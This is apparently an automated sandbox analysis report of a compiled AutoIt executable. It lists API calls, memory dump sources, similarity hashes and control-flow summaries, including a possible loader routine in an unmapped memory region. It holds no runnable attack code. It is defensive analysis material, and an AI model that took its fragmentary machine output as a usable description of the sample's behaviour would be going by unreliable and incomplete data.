• __wcsicoll.LIBCMT ref: 00402007
• __wcsicoll.LIBCMT ref: 0040201D
• __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
• __wcsicoll.LIBCMT ref: 00402049
• _wcscpy.LIBCMT ref: 0040207C
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
• API String ID: 3948761352-1609664196
• Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
• Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
• Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
• Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

Control-flow Graph

APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
• __wsplitpath.LIBCMT ref: 0040E41C
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcsncat.LIBCMT ref: 0040E433
• __wmakepath.LIBCMT ref: 0040E44F
  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
• _wcscpy.LIBCMT ref: 0040E487
  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• _wcscat.LIBCMT ref: 00427541
• _wcslen.LIBCMT ref: 00427551
• _wcslen.LIBCMT ref: 00427562
• _wcscat.LIBCMT ref: 0042757C
• _wcsncpy.LIBCMT ref: 004275BC
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
• String ID: Include$\
• API String ID: 3173733714-3429789819
• Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
• Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
• Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

Control-flow Graph

APIs
• _fseek.LIBCMT ref: 0045292B
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452961
• __fread_nolock.LIBCMT ref: 00452971
• __fread_nolock.LIBCMT ref: 0045298A
• __fread_nolock.LIBCMT ref: 004529A5
• _fseek.LIBCMT ref: 004529BF
• _malloc.LIBCMT ref: 004529CA
• _malloc.LIBCMT ref: 004529D6
• __fread_nolock.LIBCMT ref: 004529E7
• _free.LIBCMT ref: 00452A17
• _free.LIBCMT ref: 00452A20
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __fread_nolock$_free_fseek_malloc_wcscpy
• String ID:
• API String ID: 1255752989-0
• Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
• Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
• Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
• Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: FILE
• API String ID: 3888824918-3121273764
• Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
• Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
• Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 004104C3
• RegisterClassExW.USER32(00000030), ref: 004104ED
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
• InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
• LoadIconW.USER32(00400000,000000A9), ref: 00410542
• ImageList_ReplaceIcon.COMCTL32(009714F8,000000FF,00000000), ref: 00410552
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
• Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
• Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
• Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                              • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009714F8,000000FF,00000000), ref: 00410552
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _malloc
                                                                                              • String ID: Default
                                                                                              • API String ID: 1579825452-753088835
                                                                                              • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                              • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                              Control-flow Graph: basic blocks 40f5c0-40f6df and 425d05-425d5f, with calls to 422240, 413650, 410e60, 414d04, 4150d1 and 414d30 (rendered graph and its executed/not-executed colouring not reproduced in this extraction)
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                              • String ID: AU3!$EA06
                                                                                              • API String ID: 1268643489-2658333250
                                                                                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                              Control-flow Graph: basic blocks 401100-401225 and 42afb4-42b06d (window procedure calling DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW and CreatePopupMenu; internal calls to 401250, 401000, 40e0c0, 40f190, 468b0e, 401a50, 4370f4 and 45fd57; rendered graph and its executed/not-executed colouring not reproduced in this extraction)
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                              • CreatePopupMenu.USER32 ref: 00401204
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                              Control-flow Graph: basic blocks 4115d7-411656, with calls to 4135bb, 411988, 417fc0, 41130a, 4180af and 418105 (rendered graph and its executed/not-executed colouring not reproduced in this extraction)
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                              • std::exception::exception.LIBCMT ref: 00411626
                                                                                              • std::exception::exception.LIBCMT ref: 00411640
                                                                                              • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                              • String ID: ,*H$4*H$@fI
                                                                                              • API String ID: 615853336-1459471987
                                                                                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                              Control-flow Graph: basic blocks 47383e0-47386e2 (calls CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree; internal calls to 4735de0, 47392f0, 4739540 and 4739350; rendered graph and its executed/not-executed colouring not reproduced in this extraction)
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 047384B1
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 047386D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileFreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 204039940-0
                                                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                              • Instruction ID: 3302d47250a32f9d9a4452e667daf6a3a3a7850c735fe386232e8d40e3a2a33f
                                                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                              • Instruction Fuzzy Hash: 6CA12770E00208EBDB14DFA4C998BEEBBB5BF48305F208559E111BB382D775AA40CF95

                                                                                              Control-flow Graph: basic blocks 401250-4012ed and 4272ec-4273b4 (calls KillTimer, SetTimer and Shell_NotifyIconW; internal calls to 412f40 and 401b80; rendered graph and its executed/not-executed colouring not reproduced in this extraction)
                                                                                              APIs
                                                                                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                              • String ID:
                                                                                              • API String ID: 3300667738-0
                                                                                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                                              Control-flow Graph: basic blocks 40e4c0-40e4f0 and 427190-42722a (calls RegOpenKeyExW, RegQueryValueExW and RegCloseKey; internal calls to 403350, 4115d7, 43652f, 436508 and 402160; rendered graph and its executed/not-executed colouring not reproduced in this extraction)
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                              Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
• Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

Control-flow Graph (image not reproduced; single basic block 410570-4105f1 containing two CreateWindowExW and two ShowWindow calls; legend: Executed / Not Executed)
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
• ShowWindow.USER32(?,00000000), ref: 004105EE
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
